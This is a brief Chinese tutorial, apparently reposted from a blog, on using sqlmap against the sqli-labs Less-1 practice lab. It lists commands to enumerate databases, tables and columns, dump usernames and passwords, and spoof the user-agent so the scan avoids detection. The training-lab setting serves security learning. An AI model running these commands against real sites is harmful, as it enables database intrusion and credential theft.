用法以kali Linux下sqli-lab第一关为例192.168.198.136/sqli-labs/Less-1/?id=1
后面跟url 执行
sqlmap -u http://192.168.198.136/sqli-labs/Less-1/?id=1
后面跟txt ,txt内容为该url的请求报文信息
sqlmap -r /root/1.txt
sqlmap -u http://192.168.198.136/sqli-labs/Less-1/?id=1 --dbs
sqlmap -u http://192.168.198.136/sqli-labs/Less-1/?id=1 -D security --tables
sqlmap -u http://192.168.198.136/sqli-labs/Less-1/?id=1 -D security -T users --columns
sqlmap -u http://192.168.198.136/sqli-labs/Less-1/?id=1 -D security -T users -C username,password --dump
sqlmap -u http://192.168.198.136/sqli-labs/Less-1/?id=1 --users
--password
--current-db
--current-user
(避免用sqlmap 的user-agent 被发现报错)
sqlmap -u "127.0.0.1/sqli-labs/Less-1/?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --banner
用--user-agent 设置user-agent
也可以用--random-agent 随机生成user-agent
需要在host后面加号或者-level 5
需要在referer后面加号或者-level 3
sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -H "user-agent:123"(指定user-agent一个参数)
sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --headers = "user-agent:123\nCookie:123456" --banner
(--headers 同时设置多个参数)
原文:https://www.cnblogs.com/cjz12138/p/13672510.html